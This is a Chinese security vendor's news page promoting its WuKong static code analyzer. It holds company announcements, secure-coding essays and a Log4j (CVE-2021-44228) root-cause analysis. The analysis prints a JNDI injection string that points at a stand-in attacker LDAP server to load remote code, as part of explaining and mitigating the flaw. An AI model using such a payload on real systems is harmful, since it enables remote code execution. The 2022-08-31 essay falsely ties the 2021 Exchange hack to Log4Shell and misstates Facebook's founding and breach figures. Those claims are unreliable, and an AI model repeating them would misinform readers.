想了解更多安全资讯
请扫码关注中科天齐软件安全中心微信公众号
2022
09-22
中科天齐完成两大麒麟操作系统NeoCertify认证
中科天齐WuKong与麒麟软件有限公司的银河麒麟高级服务器操作系统(飞腾版、鲲鹏版)V10完成兼容性测试,并达到通用兼容性要求及性能、可靠性要求,满足用户的关键性应用需求。此次认证的完成,标志着中科天齐在助力国产化软件安全可信发展道路上迈出坚实的一步,为共同推进信创产业生态化发展奠定了良好基础。关于麒麟麒麟软件致力于打造中国操作系统新旗舰。以安全可信操作系统技术为核心,既面向通用领域打造安全创新操作系统和相应解决方案,又面向专用领域打造高安全高可靠操作系统和解决方案,能够同时支持飞腾、鲲鹏、龙芯、申威、海光、兆芯等国产CPU,为客户提供完整的国产化解决方案。银河麒麟高级服务器操作系统V10是针对企业级关键业务,适应虚拟化、云计算、大数据、工业互联网时代对主机系统可靠性、安全性、性能、扩展性和实时性的需求,依据CMMI 5级标准研制的提供内生安全、云原生支持、国产平台深入优化、高性能、易管理的新一代自主服务器操作系统。关于中科天齐北京中科天齐信息技术有限公司是在中科院计算技术研究所的大力推动下,以中科院计算所国际领先的自主研究成果“WuKong软件代码安全检测修复系统”为基础,组建的高新技术企业。Wukong软件代码安全检测修复系统作为一款静态代码分析工具,支持多种开发语言的安全缺陷检测,帮助用户提升抵御网络攻击、防止数据泄露等安全问题的能力。与麒麟完成产品适配后,中科天齐将结合WuKong在查找、识别、追踪编码安全缺陷的专业能力,进一步为政府、金融、科技、软件研发、工业互联网等众多行业领域更好地提供全方面的数字化转型支撑与安全保障,满足国产化项目要求。 未来,中科天齐将与更多国产软硬件伙伴密切合作,为用户带来更加安全可信的国产化解决方案,并推动国产软件生态圈的繁荣发展。
2022
09-19
中科天齐入选《2022年中国数字安全百强报告》专精特新百强
近日,国内数字化产业第三方调研与咨询机构数世咨询发布了《2022年中国数字安全百强报告》,本次报告调研了国内700余家网络安全业务的企业,评选出在技术创新能力方面表现优秀的100强企业。中科天齐凭借技术研发实力和创新能力入选“专精特新百强”企业。此次中科天齐入选专精特新百强,体现出业内各界对中科天齐在开发安全领域专业度和创新力的肯定。未来,中科天齐将持续发挥技术创新能力和优势,助力推动网络安全建设。北京中科天齐信息技术有限公司是中科院计算技术研究所在软件安全领域的产业化平台公司。中科天齐由中科院研究员李炼博士创立,以自主研究成果WuKong静态软件安全测试工具为主打产品,团队凭借多年在程序分析领域的技术积累,致力打造安全漏洞治理领域新生态的高新技术企业。 WuKong静态软件安全测试工具是一款B/S 架构的国产信创静态软件安全测试工具,采用自主专利技术的程序分析引擎,多种创新性的静态分析技术,结合深度学习和人工智能等多种方法,能够对软件代码进行全方位的安全扫描和安全分析。
2022
09-19
山西省网络安全和信息化学会换届大会在太原召开--中科天齐软件安全技术研究院受聘副会长单位
2021年12月12日上午,山西省网络安全和信息化学会换届大会暨第三届第一次会员代表会议在太原召开。会议听取了第二届理事会工作及财务报告,审议通过了修改的《山西省网络安全和信息化学会章程》等相关文件,选举产生了第三届理事会及领导机构和人员组成,景广学同志当选为学会第三届理事会理事长。山西省民政厅副厅长宋海兵、山西省科协副主席郝建新、山西省委网信办副主任米杰、山西省工信厅副厅长乔丽刚,山西省综改区副主任崔俊林等领导出席,会员单位代表、部分专家等共90余人参加会议。第二届理事会副理事长李贵祥代表第二届理事会作工作及财务报告。五年来,学会本着全力促进我省信息化事业发展、为经济建设服务的宗旨,积极开展各项工作,取得了长足的发展和进步。内部建设得到强化,积极开展业务交流,举办论坛讲座活动,规范定标准做认证,提升会员队伍素质,严格财务制度管理,得到有关部门的肯定。新当选会长景广学对相关部门领导和与会成员单位代表的帮助支持表示了感谢。他表示,当选为学会会长,深知这项工作的重要、这个岗位的责任、这副担子的压力。特别是面对新时代新形势新任务,深感任务艰巨、责任重大、使命光荣。如何把学会的工作做的更好,怎样把桥梁纽带作用发挥的更为有效,这将是认真思考、躬身实践的重要问题,要有登山情满于山、观海意溢于海的胸怀,认真履职尽责,努力把学会建设好、发展好。省有关部门领导讲话,充分肯定了学会多年来的工作,对大会完成各项议程、取得圆满成功表示祝贺,并就做好学会工作、架好网信桥梁、致力工作研究、促进产业发展等方面提出了指导性意见。宋海兵强调要坚持党的领导,保持正确政治方向;激发组织活力,围绕全方位推进高质量发展发挥作用;规范内部管理,切实加强自身建设,努力把学会办成全省有影响力的社会组织。郝建新提出要坚持政治引领,实施党建强会;坚持“三轮驱动”,实施服务兴会;坚持建家交友,实施人才立会,在全力构建网络安全和信息化科技工作者之家的自身建设中增强学会的凝聚力。米杰提出要牢牢把握正确发展方向,积极发挥桥梁纽带作用,不断拓宽服务领域,为我省全方位推动高质量发展作出新的更大的贡献。山西省网络安全和信息化学会由2008年成立的山西省信息化学会更名的,由山西省委网信办、山西省工信厅业务指导,山西省科协业务主管,经山西省民政厅批准,成立的全省性的网络安全和信息化行业社会组织。景广学在发言中提出,当前和今后—个时期的总体思路是:坚持以习近平新时代中国特色社会主义思想为指导,充分发挥党和政府相关部门与网络安全和信息化行业之间的桥梁纽带作用,着力构建产、学、研、管、商、用“六位一体”的协同创新联盟,致力网信研究,探索辅政之道,强化相互交流,提高队伍素质,推动网络安全和信息化行业制度化、规范化建设,优质高效服务山西网信事业发展和国家治理体系治理能力建设,为我省全方位高质量发展做出新的更大的贡献。他强调,要以“386”工作思路和举措抓好学会工作:一是提高政治站位,做到“三个坚持”,坚定把学会办好的信心决心。要坚持以习近平总书记关于网络强国重要思想为根本遵循,坚持以省委对网信工作的安排部署作为工作重心,坚持以打造具有品牌和影响力的一流团体作为奋斗目标。二是聚焦目标任务,突出八个重点,以狠抓落实带动全会工作。编印《山西信息化年鉴》,办好《山西省网络安全和信息化》,举办高峰论坛,建立山西网信专家智库,承办网安知识攻防大赛,规范网络安全和大数据信息技术标准制定,实施网络安全服务资质及人员认证,强化职业技能等级认定和培训评价。三是强化高效管理,确保六个到位,推动学会工作扎实有效运作。思想认识到位,准确把握学会工作新定位;科学谋划到位,有序推进学会工作新突破;建章立制到位,着力构建学会工作新体系;服务保障到位,努力实现学会工作新跨越;队伍建设到位,坚定树立一流学会新形象;组织领导到位,努力开创学会工作新局面。 会议选举张明胜、高育新、彭晋春、金琨、李晓林、叶晓虎、韩温为副理事长,苏晓婷为秘书长。还表决通过了《山西网络专家智库管理办法》《山西省网络安全和信息化学会会标及寓意》等,为副会长单位颁发了牌匾
2022
09-13
在开发过程中保护软件供应链安全
自2020年12月SolarWinds 攻击以来,软件供应链攻击一直是软件开发公司关注的问题。受到攻击不仅会危及企业,还会危及相关客户。另一个复杂因素是应用程序使用开放软件组件和本地代码的组合来交付应用程序。这种软件供应链意味着,应用程序的安全问题可能受到自己代码的影响,也可能会来自所使用的组件。Log4j攻击就是组件在使用它的任何软件中引入漏洞的一个例子。如何保护软件需要从不同角度思考安全从哪里开始,以及如何在开发过程的早期将安全概念集成到软件中,并与其他技术基础的实施进行交互。构建安全的管道现代软件开发建立在 CI/CD 管道之上。这允许应用程序安全测试和软件成分分析在集成过程的早期进行(左移),并且允许企业在代码交付前识别并修复问题。通过管道运行代码、集成安全测试、识别缺陷、修复缺陷并部署安全的软件。理论听起来很简单,但在现实中实施起来可能具有挑战性。首先,安全左移需要开发人员和安全团队之间的协作。如果没有得到修复,找到安全问题并不重要。安全团队并不是将一份包含数百个缺陷和漏洞的报告丢给开发人员,并期望问题能得到解决。为了增加缺陷得到修复的可能性,安全团队需要向开发人员提供有关缺陷或漏洞的修复紧急程度,并对解决方案给出一些指导。其次,安全性应该通过提供基础设施即代码 (IaC) 模板和工具链来增加开发和架构流程的价值,从而轻松实现安全的应用程序堆栈。对抗供应链攻击最后,通过对开发人员进行安全培训及在安全团队中培训开发人员,可以链接开发及安全之间的距离,也有助于减小安全开发的阻力。 考虑到软件的复杂性、代码的攻击面和开发过程的速度,对抗供应链攻击需要安全与开发团队紧密和持续的协作,并向左转移以在集成过程中更早地发现安全问题。
2022
09-08
中科天齐加入PK体系生态联盟 助力信创生态软件安全
近日,中科天齐在经过严格的评审后,成功加入了PK体系生态联盟(简称联盟)。作为联盟成员,中科天齐将持续提升软件自主创新能力与应用推广,在软件安全领域发挥力量,与联盟成员实现知识共享、优势互补、携手共进。加上此次最新加入的23家会员单位,联盟会员数量达137家。关于PK体系生态联盟PK 体系生态联盟(简称联盟)在中国电子信息产业集团有限公司的倡议下,广泛联合中央企业、国家研究机构、知名 ICT 企业等生态伙伴发起设立,作为中国电子信息行业联合会(简称电子联合会)的分支机构,接受电子联合会业务指导。联盟旨在贯彻落实国家网络强国战略,本着“平台共建、资源共享、联合创新、开放发展”的原则,围绕 PKS 体系,促进相关主体之间的交流合作,促进供需对接、知识共享、优势互补,有效推进自主技术研发创新与应用推广,发展和完善自主产业生态,服务于信息技术应用创新和行业数字化转型,促进PKS 体系进一步融入移动生态和云计算、大数据、物联网、5G、人工智能等新一代信息通信技术,实现 PKS 体系与时俱进发展。关于中科天齐北京中科天齐信息技术有限公司(简称中科天齐)是中科院计算技术研究所在软件安全领域的产业化平台公司。中科天齐由中科院研究员李炼博士创立,以自主研究成果 WuKong 静态软件安全测试工具(简称WuKong)为主打产品,团队凭借多年在程序分析领域的技术积累,致力打造安全漏洞治理领域新生态的高新技术企业。公司为政府、金融、科技、软件研发、工业互联网等多个行业领域提供全方面的数字化转型支撑与安全保障。WuKong 是一款 B/S 架构的国产信创静态软件安全测试工具,采用自主专利技术的程序分析引擎,多种创新性的静态分析技术,结合深度学习和人工智能等多种方法,能够对软件代码进行全方位的安全扫描和安全分析。 目前,WuKong 已获得国家信息安全漏洞库CNNVD 兼容性认证及CWE国际兼容性认证。兼容飞腾、麒麟、鲲鹏等多种国产化环境。
2022
09-05
为什么当前的软件安全方法不足?如何提高编码安全?
安全漏洞通常在开发中不易察觉而在部署应用程序后才出现。许多安全性缺陷和bug本可以在更早的阶段得到解决,并且有适当的方法和工具来发现它们。bug的真正代价软件缺陷是不可避免的,然而,代码中任何未修复的缺陷都是攻击者的命脉。如果他们能在系统中找到至少一个可以以正确方式利用的漏洞(即软件漏洞),他们就可以利用该漏洞造成巨大的损失,可能达到数千万美元的规模。即使修复的漏洞不太严重,修复成本也可能非常昂贵。数据显示如果将问题发现和修复代码移至编码阶段可以为企业节省20%成本,而在产品发布后,修改缺陷成本则将增加五倍。为什么当前的软件安全方法不足?安全人员参与度不够自动化和网络安全工具应该通过扫描、检测和缓解软件漏洞来减少开发人员和应用程序安全人员的工作量,但是工具未发现的问题需要开发人员和安全人员进行补足。DevSec 断开连接DevSec 脱节指的是开发团队和安全团队之间的紧张关系,因为在涉及新功能和缺陷修复时优先级不同。由于这种摩擦,48%的开发人员会最终将易受攻击的不安全代码投入生产。在开发周期后期发现的漏洞通常不会得到缓解,或者最终会产生额外的成本、延迟和进一步的风险。最好从源头上解决问题,而不是在软件开发生命周期的后期花费时间和资源来查找代码缺陷。监控供应链安全缺忽视自己的软件另一个常见的错误是只关注软件供应链安全,只处理常见的通用漏洞和暴露数据库或国家漏洞数据库中列出的现有软件产品和包中的已知漏洞。检测第三方组件及依赖项或操作环境中的安全漏洞必不可少,但检测自己代码中的漏洞也十分必要。让安全编码成为共识网络安全的强弱取决于最薄弱的环节。开发人员是从源头提高安全的问题解决者,一段代码是否安全开发人员发挥很大作用。但如果开发人员不了解特定类型的不安全实践,他们很可能会继续犯相同的错误(并在开发环境中引入相同类型的漏洞)代码)。增强安全编码的技巧新发现的漏洞数量不断增加,恶意网络攻击者所构成的威胁也越来越复杂。大多数组织在事件发生后开始实施安全的开发生命周期,对安全的关注肯定是越早越好。将安全扩展到开发的早期阶段通过SAST、IAST、SCA等工具及DAST或渗透测试来全面覆盖开发安全,并将安全问题提前在软件投入生产前。覆盖整个 IT 生态系统第三方漏洞给企业的网络安全带来巨大的风险,因此除了检测开发人员可能给应用程序引入的问题,需要能够检测云和第三方环境中的漏洞。从防御转向预防将防御性编程概念添加到编码指南中,提高软件自身“免疫”有助于从内部提高网络安全性。安全代码培训 对开发人员进行安全编码培训,了解安全编码标准、漏洞数据库等信息,帮助开发人员了解安全编码的重要性及安全漏洞危害等,在开发过程中提高编码安全性。
2022
08-31
网络世界安全需要更多关注,静态代码检测提高软件安全性
随着数据泄露、密码泄露和对企业的网络攻击的数量达到前所未有的水平。目前,每 39 秒就有一次针对公司的网络攻击,每次成功的攻击都会给企业造成数百万美元的损失。网络安全几十年来一直是一个问题,但这个问题似乎只会越来越严重,近年来记录的网络攻击数量急剧增加。仅在 2021 年,每天就有 30,000 个网站遭到黑客攻击,每周的攻击次数平均比 2020 年增加 50%。从个人数据到商业文件和财务信息,没有什么是完全安全的,目前可用的各种网络黑客工具似乎都能逃过网络安全部署的防御。2021 年,Log4Shell 漏洞导致全球大型科技公司为网络犯罪分子的入侵敞开大门。网络世界的安全需要更多关注。过去几十年发生的一些值得注意的安全威胁行为包括:2013 年,雅虎——仍然保持着受单一漏洞影响人数最多的记录,这次后门黑客攻击影响了超过 30 亿个账户,并导致个人信息丢失。这为黑客提供了安全问题、密码、姓名、电子邮件地址、电话号码以及附加到个人雅虎帐户的任何其他个人信息的答案。2014 年,摩根大通——这一漏洞使7600 万户家庭因一次单一的网络攻击而受损。虽然泄露的信息不是财务性质的,但它确实发布了个人电子邮件、电话号码、姓名等。从那时起,摩根大通现在每年花费 2.5 亿美元来妥善保护其数据。2021 年,微软——美国历史上最具影响力的网络犯罪之一发生在 2021 年 1 月,当时所有Microsoft Exchange 电子邮件服务器都遭到黑客攻击。通过使用 Log4Shell 漏洞,黑客能够在一系列系统上部署恶意软件,并影响全球超过 60,000 家公司,因为微软通过 Teams 和 Outlook 在一系列公司中进行了部署。2021年,Facebook –超过 5.3 亿用户被曝光,这一违规行为导致个人数据大量丢失,这是该公司自 2012 年成立以来的最新一次违规行为。2021 年,康卡斯特——2021 年最大的违规事件发生在康卡斯特,该品牌有 15 亿条记录被黑客从其数据库中清除。这一巨大的数据泄露占用了数百万个帐户、内部 IP 地址、节点名称和其他主要指标,以进行进一步的黑客攻击。对这家公司的攻击有点像滚雪球,被释放的信息导致了一系列进一步的黑客攻击。虽然这些并不是在此期间发生的唯一值得注意的攻击,但它们是其中一些最大的攻击。即使从这个小的选择中,我们也可以看到发生重大攻击的频率正在变得越来越频繁。虽然大规模的网络攻击曾经很少见,但现在它们在某些方面几乎每周都会出现。世界各国都看到网络犯罪数量不断增加,尤其随着 COVID大流行导致企业加速数字化转型及远程办公,进一步增加了网络安全威胁。随着越来越多的网络威胁被发现,企业更加关注其在网络安全上的防御。重视对员工进行网络安全重要性教育。超过95% 的数据泄露直接追溯到导致漏洞的人为错误或行为。从个人不小心将勒索软件下载到他们的计算机上,再到选择了弱密码,人们可以通过多种方式通过简单的错误暴露公司信息。技术的最大趋势之一是去中心化技术的广泛普及。去中心化技术的核心是创建一个没有单点故障的系统,永远不必依赖中心化的组织或单个节点。去中心化网络安全网格采用了这个想法并与之一起运行,将每一个设备转换为一个验证节点。这意味着所有设备都在实时检查和监控其他所有设备,将单一故障点转变为多个防御点。结合人工智能和自动化流程。虽然网络安全专家可以制定防御措施并手动检查系统的每个潜在入口点,但随着攻击面变得越来越复杂和规模越来越大,越来越多的企业采用自动化工具。除了渗透测试,对安全漏洞的发现左移到开发中来。通过静态应用安全测试在软件编码期间查找安全缺陷,进一步减少漏洞数量。 随着向防御战略的大规模运动和网络安全研究的不断发展,我们目前看到了一系列有效的做法,帮助我们在新的数字时代保护个人和企业的安全。
2022
08-30
中科天齐成为央行北京金融科技产业联盟监管科技联合实验室成员单位
2021年12月22日,北京金融科技产业联盟第二届会员大会第三次会议在京成功召开。本次会议选举增补理事单位、进行理事会和监事会工作报告、发布联盟2021年工作成果、公布联名聘任专家名录、举办联合实验室启动仪式、以及开展各专委会工作交流等内容。中科天齐受邀出席会议并参加联合实验室启动仪式。会议宣布中科天齐为央行北京金融科技产业联盟监管科技联合实验室成员单位,下一步,中科天齐将与银行卡检测中心等机构共同建设和运营监管科技平台,服务各银行等金融机构。 北京中科天齐信息技术有限公司是在中科院计算技术研究所的大力支持下,以中科院计算所国际领先的自主研究成果“WuKong软件代码安全检测修复系统”为基础,组建的高新技术企业。
2022
08-25
静态代码检测工具Wukong对log4J中的漏洞检测、分析及漏洞修复
一、简介最近的Log4J漏洞(CVE-2021-44228)正造成网络大乱,其影响力不亚于早期的HeartBleeding漏洞。2.0-beta9 ~ 2.14.1版本的Apache Log4j2均存在改漏洞,可以说直接影响了大部分基于Java的应用。该漏洞最早被阿里云安全团队发现并验证,随即被Apache定义为高危级别。Log4j在log字符串”${jndi:xxx}”时,“${“这一特殊字符会指定Log4J通过JNDI来根据字符串”xxx”获得对应名称。如果字符串“xxx”为有害的URL” (LDAP:// attackerserver.com:1389/ExploitPayload”),JNDI会远程加载调用该URL指定的服务器上任意代码并执行。JNDI(Java Naming and Directory Interface),是Java的一个目录服务应用程序接口(API),它提供一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。该漏洞属于典型的注入类型漏洞,攻击者通过控制日志消息或日志消息参数注入恶意代码。如果用户输入被输出到日志中,由于Log4J组件未对用户输入进行充分输入验证,攻击者可以通过Apache Log4j2 JNDI 功能来执行注入代码,包括从指定恶意LDAP服务器并加载的的任意代码。二、通过Wukong检测log4J漏洞对于注入类漏洞(包括SQL注入、命令行注入、XSS等),我们可以通过经典的信息流分析技术来检测是否存在一条路径从用户输入 (Source) 到达危险操作点(Sink),且该用户输入未经过输入验证。对于Log4J漏洞,当检测log4J库时,Source为Log4J组件提供的公共API输入(例如Log4j.error()的参数),Sink为访问JNDI服务的接口。Wukong可以有效地检测出Log4J库中存在的jndi注入问题。如图1所示。  图1:通过Wukong检测Log4J漏洞注意触发该漏洞的调用链非常长,隐藏比较深且涉及到复杂的指针依赖关系,我们测试过一些其他静态分析工具均未能检测出该漏洞。三、错误根源分析漏洞触发路径如下所示:1、 获取Logger,并调用error方法2、 error方法内会调用logIfEnabled方法,注意,debug、info、warn、error、fatal等公共API都会调用logIfEnabled方法3、 logIfEnaled方法会调用logMessage方法4、 接着会根据进入下列调用链:logMessageSafely -> logMessageTrackRecursion -> tryLogMessage -> Logger.log -> DefaultReliabilityStrategy.log -> processLogEvent -> callAppenders -> callAppenderPreventRecursion -> callAppender0 -> tryCallAppender -> append -> tryAppend -> directEncodeEvent -> PatternLayout.encode -> toText -> toSerializable -> PatternFormatter.format 最终会调用MessagePatternConverter类的format函数,当日志字串带有”${”的时候会特殊处理。5、 字串会交给StrSubstitutor做replace -> substitute处理,找到 “${” 对应的 “}” 并提取中间的字串,这里是“jndi:xxx”6、 Substitute方法会调用resolveVariable,接着会调用JndiLookup类的lookup函数7、 最后JndiManager的lookup函数会解析jndi资源,这里是“xxx”,如果“xxx“部分是可执行的恶意程序,那么该程序将会被执行,从而产生非常严重的危害。因而,如果服务器代码中直接将用户的输入使用Logger写入日志,则用户可以构造任意恶意代码攻击服务器。四、漏洞修复对该漏洞的修复在log4j2.15.0及以后版本中是通过将“${“字符过滤进行特殊处理。对于应用的补丁是建议直接升级到2.15.0及以后版本,如果由于兼容性的原因难以升级,可以通过以下方法暂时处理:1、 修改jvm启动参数,-Dlog4j2.formatMsgNoLookups=true2、 修改配置:log4j2.formatMsgNoLookups=True3、 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 设置为 true 同时注意该漏洞仅仅能在用户输入被Log的时候触发,因而我们可以通过静态分析工具Wukong检测应用中是否存在用户输入直接输出到日志中:对于应用程序代码我们可以将外部输作为source,将log函数作为sink,查看是否存在一条路径可达,即是否存在外部输入可以控制log函数的参数。如果不存在这样一条路径,log4J中的漏洞也不会触发。